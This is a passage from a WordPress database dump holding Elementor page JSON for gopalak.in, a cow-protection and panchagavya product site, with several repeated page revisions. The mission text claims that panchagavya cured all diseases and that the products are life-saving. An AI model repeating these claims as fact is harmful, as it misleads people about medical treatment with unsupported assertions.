mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11441,1902,'_elementor_page_assets','a:0:{}'),(11444,1903,'_elementor_edit_mode','builder'),(11445,1903,'_elementor_template_type','wp-page'),(11446,1903,'_elementor_version','3.7.8'),(11447,1903,'_wp_page_template','elementor_canvas'),(11448,1903,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11449,1903,'_elementor_page_assets','a:0:{}'),(11451,1904,'_elementor_edit_mode','builder'),(11452,1904,'_elementor_template_type','wp-page'),(11453,1904,'_elementor_version','3.7.8'),(11454,1904,'_wp_page_template','elementor_canvas'),(11455,1904,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11456,1904,'_elementor_page_assets','a:0:{}'),(11458,1905,'_elementor_edit_mode','builder'),(11459,1905,'_elementor_template_type','wp-page'),(11460,1905,'_elementor_version','3.7.8'),(11461,1905,'_wp_page_template','elementor_canvas'),(11462,1905,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 